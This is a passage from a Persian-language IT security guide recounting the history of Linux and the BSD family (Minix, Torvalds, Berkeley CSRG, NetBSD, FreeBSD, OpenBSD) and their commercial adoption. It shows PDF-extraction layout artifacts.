‫ﺑﺮ ‪ Intel‬ﻣﺠﻬﺰ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻃﺮﺡ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻳﻚ ﺑﺴﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺴﺘﻨﺪﺳﺎﺯﻱﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﻋـﺎﻟﻲ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ "ﻛﺎﺭﺁﻣﺪﻱ" ﺩﺭ ﻃﺮﺍﺣﻲ ‪ Minix‬ﻳﻚ ﻣﻌﻴﺎﺭ ﺍﺳﺎﺳﻲ ﻧﺒﻮﺩ‪ ،‬ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺩﺭ ﻛﻨﺎﺭ ﻣﺴﺎﺋﻞ ﺭﻋﺎﻳﺖ ﺣﻖ ﻛﭙـﻲ ﻣﺮﺑـﻮﻁ‬
‫ﺑﻪ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺑﺎﻋﺚ ﺷﺪ ‪ Minix‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﺯﻣﺮﻩ ﺩﺭ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ‪ ،‬ﮔﺰﻳﻨﺔ ﺧﻮﺑﻲ ﺍﺯ ﺁﺏ ﺩﺭﻧﻴﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۱‬ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﻋﻠﻮﻡ ﺭﺍﻳﺎﻧﺔ ﻓﻨﻼﻧﺪﻱ ﺑﻪ ﻧﺎﻡ ﻟﻴﻨﻮﺱ ﺗﺮﻭﺍﻟﺪﺯ‪ ٢٢‬ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﻳﻚ ﻧﺴﺨﺔ ﺁﺯﺍﺩ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ‪ Unix‬ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﻣﺮﻩ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎﺷﺪ ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ‪ ،Minix‬ﮔﺎﻡ ﺑﻪ ﮔﺎﻡ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ﻭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺩﻭﺑـﺎﺭﻩ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻛﻪ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺗﺎﻧﻨﺒﺎﻡ ﺩﺭ ﺁﻥ ﻧﺒﻮﺩ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺳﻴﺴﺘﻢ ﺑﺪﺳﺖ ﺁﻣـﺪﻩ‬
‫ﺭﺍ "‪ "Linux‬ﻧﺎﻣﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺁﻧﺮﺍ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ‪ GPL‬ﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪ .‬ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺗﺮﻛﻴﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑـﺎ ﺳـﺎﻳﺮ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﺭﺍﻳﮕﺎﻥ ﻣﻮﺟﻮﺩ ﺧﺼﻮﺻﹰﺎ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﻭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ ‪ GNU‬ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Windows‬ﻛﻨﺴﺮﺳﻴﻮﻡ ‪ ،X‬ﺗﻮﺍﻧـﺴﺖ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻛﺎﻣﻞ ﻭ ﻋﻤﻠﻴﺎﺗﻲ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﻛﺎﺭ ﺭﻭﻱ ‪ Linux‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺗﻮﺳﻂ ﺻﺪﻫﺎ ﻛﻤﻚﻛﻨﻨﺪﻩ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺩﺍﺭﺩ‪.‬‬

‫‪NetBSD, FreeBSD, OpenBSD‬‬


‫‪٢٣‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۸‬ﮔﺮﻭﻩ ﺗﺤﻘﻴﻘﺎﺕ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﻛﻠﻲ )‪ (CSRG‬ﻃﺮﺣﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﺬﻑ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ AT&T‬ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫ﺧﻮﺩ ﺷﺮﻭﻉ ﻛﺮﺩ‪" .‬ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺍﻭﻝ" ﻛﻪ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﮊﻭﺋﻦ ‪ ۱۹۸۹‬ﺁﻣﺎﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺷـﺎﻣﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺑﺮﻛﻠـﻲ ﺍﺯ‬
‫‪ TCP/IP‬ﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﺑﻮﻃﻪ ﻣﻲﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﻪ ﺑﻬﺎﻱ ‪ ۱۰۰۰‬ﺩﻻﺭ ﺭﻭﻱ ﻧﻮﺍﺭ ﺿﺒﻂ ﺗﻮﺯﻳﻊ ﺷﺪ‪ ،‬ﻭ ﻫﺮ ﻛﺲ ﻛـﻪ ﺁﻥ ﺭﺍ ﺧﺮﻳـﺪﺍﺭﻱ‬
‫ﻣﻲﻛﺮﺩ ﻣﺠﺎﺯ ﺑﻮﺩ ﻫﺮ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﻣﻲﺧﻮﺍﺳﺖ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪ ﺁﻥ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻣﺤﺪﻭﺩﻳﺖ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﺍﺻﻠﻲ ﻣﺤﻔـﻮﻅ ﺑﻤﺎﻧـﺪ‪.‬‬
‫ﭼﻨﺪ ﺑﺮﻧﺎﻣﺔ ﺑﺰﺭﮒ ﺑﺮﻧﺎﻣﻪ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‪ ٢٤‬ﺭﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻧﺪ؛ ﻭ ﺑﺮﻧﺎﻣﺔ ﺑﺮﻛﻠﻲ ﺑﺴﺮﻋﺖ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺒﻨﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱﻫـﺎﻱ‬
‫‪ TCP/IP‬ﺩﺭ ﺳﺮﺍﺳﺮ ﺻﻨﻌﺖ ﺷﺪ‪ .‬ﻳﻚ ﻣﺤﺼﻮﻝ ﻣﻮﻗﺖ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ 4.3BSD Reno‬ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ‪ ۱۹۹۰‬ﻭ ﻣﺤـﺼﻮﻝ ﻣﻮﻗـﺖ ﺩﻭﻡ‪،‬‬
‫"ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺩﻭﻡ"‪ ،‬ﺩﺭ ﮊﻭﺋﻦ ‪ ۱۹۹۱‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ .‬ﺍﻳﻦ ﻣﺤﺼﻮﻝ‪ ،‬ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻛﺎﻣـﻞ ﺑـﻮﺩ ﻣﮕـﺮ ﺑـﺮﺍﻱ ‪ ۶‬ﻓﺎﻳـﻞ‬

‫‪19‬‬ ‫‪GNU General Public License‬‬


‫‪20‬‬ ‫‪Free Software Foundation‬‬
‫‪21‬‬ ‫‪Andrew S. Tanenbaum‬‬
‫‪22‬‬ ‫‪Linus Torvalds‬‬
‫‪23‬‬ ‫‪Berkeley Computer Systems Research Group‬‬
‫‪24‬‬ ‫‪FTP Anonymous Connection‬‬
‫‪٢٦١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺩﺭ ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﻛﻪ ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ AT&T‬ﻣﻲﺷﺪﻧﺪ ﻭ ﻟﺬﺍ ﺩﺭ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺑـﻮﺩ‪ .‬ﺩﺭ ﭘـﺎﺋﻴﺰ ‪ ۱۹۹۱‬ﺑﻴـﻞ‬
‫ﺟﻮﻟﺘﻴﺰ‪ ٢٥‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺍﻳﻨﺘﻞ ﻧﻮﺷﺖ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺑﻪ ﻧﺎﻡ ‪ 360/BSD‬ﭘﺪﻳﺪ ﺁﻭﺭﺩ‪.‬‬

‫ﻇﺮﻑ ﭼﻨﺪ ﻣﺎﻩ ﮔﺮﻭﻫﻲ ﺍﺯ ﺩﺍﻭﻃﻠﺒﺎﻥ ﻣﻮﻇﻒ ﺷﺪﻧﺪ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻢ ﺗﺸﻜﻴﻞﺷﺪﻩ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺗﻼﺵ ﺁﻧﺎﻥ ‪NetBSD‬‬
‫ﻧﺎﻣﮕﺬﺍﺭﻱ ﺷﺪ‪ .‬ﻃﺮﺡ ‪ NetBSD‬ﺑﺴﺮﻋﺖ ﺍﺯ ﻫﻢ ﭘﺎﺷﻴﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻣﻌﺘﻘﺪ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﭘﺮﻭﮊﻩ ﺑﺎﻳﺪ ﺁﻧﻘﺪﺭ ﮔﺴﺘﺮﺵ ﻳﺎﺑـﺪ ﻛـﻪ‬
‫ﺑﺘﻮﺍﻧﺪ ﺗﺎ ﺟﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺩﺍﻣﻪ ﺩﻫﺪ‪ ،‬ﻭﻟﻲ ﺍﻋﺘﻘـﺎﺩ‬
‫ﮔﺮﻭﻩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﻧﺠـﺎ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﻪ ﺑﻬﺘـﺮ ﺍﺟـﺮﺍ ﺷـﺪﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﻭﻱ‬
‫ﺑﺴﺘﺮ‪ Intel/386‬ﻭ ﺳﺎﺩﻩﺗﺮ ﺷﺪﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ‪ .‬ﮔﺮﻭﻩ ﺩﻭﻡ ﺍﺯ ﮔﺮﻭﻩ ﺍﻭﻝ ﺟﺪﺍ ﺷـﺪ ﻭ ﭘـﺮﻭﮊﺓ ‪ FreeBSD‬ﺭﺍ ﺷـﺮﻭﻉ‬
‫ﻛﺮﺩ‪ .‬ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ‪ ،‬ﻳﻚ ﮔﺮﻭﻩ ﺍﻧﺸﻌﺎﺑﻲ ﺩﻳﮕﺮ ﺍﺯ ﭘﺮﻭﮊﻩ ‪ NetBSD‬ﺟﺪﺍ ﺷﺪ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺑﻮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻣـﻮﺭﺩ‬
‫ﺗﻮﺟﻪ ﻻﺯﻡ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺗﺄﻛﻴﺪ ﺍﻳﻦ ﮔﺮﻭﻩ ﺭﻭﻱ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﺋﻲ ﻣـﺸﻜﻼﺕ ﺑـﺎﻟﻘﻮﻩ ﺑـﻮﺩ‪ .‬ﺁﻧﻬـﺎ ﺍﻗﺘﺒـﺎﺱ ﺍﺯ‬
‫ﻼ ﺑﺮﺭﺳﻲ ﻧﺸﺪﻩﺑﻮﺩﻧﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﮔـﺮﻭﻩ ﺳـﻮﻡ ‪OpenBSD‬‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻭ ‪driver‬ﻫﺎ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻛﻴﻔﻴﺖ ﻛﺎﻣ ﹰ‬
‫ﻧﺎﻡ ﮔﺮﻓﺖ‪.‬‬

‫ﻣﺸﺎﻏﻞ ‪ Unix‬ﺭﺍ ﺑﺮﮔﺰﻳﺪﻧﺪ‬


‫ﺑﻪ ﺩﻟﻴﻞ ﻗﻴﻤﺘﮕﺬﺍﺭﻱ ﺍﻧﺤﺼﺎﺭﻱ ‪ Microsoft‬ﻭ ﺍﻣﻨﻴﺖ ﻭ ﻇﺮﺍﻓﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ ،Unix‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺗﺠﺎﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Linux‬ﻋﻼﻗﻪﻣﻨﺪ ﺷﺪﻧﺪ‪ .‬ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻟﻮﺍﺯﻡ ﺷﺒﻜﻪ‪ ،‬ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺍﻣﻨﻴﺖ ﺑﺴﺘﺮ ‪ OpenBSD‬ﺭﺍ ﻣﻄﻠﻮﺏ ﻳﺎﻓﺘﻨﺪ‬
‫ﻭ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﺑﺮﺩﻧﺪ‪ .‬ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﻨﻬﺎﺩﻱ ‪ BSDI‬ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﺠـﺎﺭﻱ ﺑـﻮﻳﮋﻩ ﺑﻌـﻀﻲ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺍﺻﻠﻲ ﻣﻴﺰﺑﺎﻥ ﻭﺏ ﺍﻭﻟﻴﻪ ﺟﺬﺍﺏ ﺑﻮﺩ ﻭ ﺁﻧﺮﺍ ‪ BSD/OS‬ﻧﺎﻣﻴﺪﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﺨﺘﻠﻒ ‪ BSD/OS‬ﺭﺍ ﺑﻪ ﻟﺤﺎﻅ ﺷﺮﺍﻳﻂ ﻣﻨﺎﺳـﺐ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﺍﻱ ﻭ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺮﺍﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻭ ﺩﺍﻧﺸﻜﺪﻩ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻧﺪ‪.‬‬
‫ﺩﺭ ﻫﻤﻴﻦ ﺍﺛﻨﺎ ﺩﺭ ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎﻱ ﺷﺨﺼﻲ ﺧﻮﺩ ﺑﻪ ﺩﻧﺒﺎﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺩﻧﺪ ‪ Linux‬ﺑﺴﻴﺎﺭ ﻣﺘـﺪﺍﻭﻝ ﺷـﺪ‪.‬‬
‫ﮔﺮﭼﻪ ‪ OpenBSD‬ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦﺗﺮ ﻭ ﭘﺎﻳﺪﺍﺭﺗﺮ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ‪ Linux‬ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉﺗﺮﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛـﺮﺩ‬
‫ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺮﺍﺣﻞ ﻧﺼﺐ ﻭ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺁﻥ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﺳﺎﻧﺘﺮ ﺑﻮﺩ‪.‬‬
‫ﺗﺄﺛﻴﺮﺍﺕ ﻛﻠﻴﺪﻱ ﺩﻳﮕﺮ ﺩﺭ ﻧﻴﻤﺔ ﺩﻭﻡ ﺩﻫﺔ ‪ ۱۹۹۰‬ﺯﻣﺎﻧﻲ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩ ﻛـﻪ ﻣﺤﻘﻘـﺎﻥ ﺩﺭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ ﻣﻠـﻲ ﻣﺨﺘﻠـﻒ‪ ،‬ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﺭ ‪ NASA‬ﻛﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷﺪﻩ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺷﻪﺑﻨﺪﻱﺷـﺪﻩ ﺻـﺪﻫﺎ ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ ﺗﻬﻴـﻪ‬
‫ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭ ﻗﻔﺴﻪﻫﺎ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﻭ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﺴﺎﺋﻞ ﺑـﺰﺭﮒ ﺑﺠـﺎﻱ ﺍﺟـﺮﺍﻱ‬
‫ﺧﻴﻠﻲ ﺳﺮﻳﻊ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑﻪ ﭼﻨﺪ ﻗﺴﻤﺖ ﻗﺎﺑﻞ ﻣﺪﻳﺮﻳﺖ ﺗﻘﺴﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺼﻮﺭﺕ ﻣـﻮﺍﺯﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻨـﺎﺭ ﻫـﻢ ﺗﺤﻠﻴـﻞ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﻫﻤﺔ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻛﺎﺭﺑﺮﺩ ﻧﺒﻮﺩ‪ ،‬ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﺑﻬﺘﺮ ﺍﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻨﻔﺮﺩ ﺟﻮﺍﺏ ﻣﻲﺩﺍﺩ ﻭ ﻋـﻼﻭﻩ‬
‫ﺑﺮ ﺁﻥ ﻫﺰﻳﻨﺔ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺑﻮﺩ ﻭ ‪ Beowulf‬ﻧﺎﻡ ﺩﺍﺷﺖ‪ ،‬ﻣﺒﺘﻨﻲ ﺑﺮ‬
‫‪ Linux‬ﺑﻮﺩ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﻪ ﺁﻥ ﺗﻮﺳﻂ ﺟﺎﻣﻌﺔ ﺍﺑﺮﺭﺍﻳﺎﻧﻪﺍﻱ‪ Linux ،‬ﺑـﻪ ﺳـﺮﻋﺖ ﻣﻴـﺎﻥ‬
‫ﺳﺎﻳﺮ ﮔﺮﻭﻫﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻛﻪ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﭘﺨﺶ ﺷﺪ‪.‬‬
‫ﻫﻤﺔ ﺍﻳﻦ ﻋﻼﻳﻖ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺎ ﻣﺸﻜﻼﺕ ﻓﺰﺍﻳﻨﺪﻩ ﺑﺎﺯﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Microsoft‬ﺩﺭ ﻫـﻢ ﺁﻣﻴﺨـﺖ‪ ،‬ﺗﻮﺟـﻪ ﺩﻭ ﺷـﺮﻛﺖ ‪ IBM‬ﻭ‬
‫‪ Dell‬ﻛﻪ ﻫﺮ ﺩﻭ ﺍﺯ ‪ Linux‬ﺍﻋﻼﻡ ﺣﻤﺎﻳﺖ ﺗﺠﺎﺭﻱ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ‪ .‬ﺩﺭ ﻫﻤﻴﻦ ﺍﻳﺎﻡ ﺩﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ‪Linux‬‬
‫ﻣﻲﭘﺮﺩﺍﺧﺘﻨﺪ ‪ Redhat -‬ﻭ ‪ - VA Linux‬ﺩﻭ ﻓﻘﺮﻩ ﺍﺯ ﻣﻮﻓﻖﺗﺮﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﻭﻟﻴﺔ ﻣﺮﺩﻣﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ﺑـﻮﺭﺱ ﺳـﻬﺎﻡ ﺍﻳﺎﻟـﺖ ﻣﺘﺤـﺪﻩ ﺭﺍ‬
‫ﻧﺼﻴﺐ ﺧﻮﺩ ﻛﺮﺩﻧﺪ‪ .‬ﻣﺪﺕ ﻛﻮﺗﺎﻫﻲ ﭘﺲ ﺍﺯ ﺁﻥ ‪ HP‬ﺍﻋﻼﻡ ﻛﺮﺩ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ Linux‬ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺶ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪25‬‬ ‫‪Bill Jolitz‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٦٢‬‬

‫ﺍﻣﺮﻭﺯﻩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﺎﻏﻞ ﻭ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺎ ‪ Linux‬ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺯ ‪ Linux‬ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ‪،‬‬
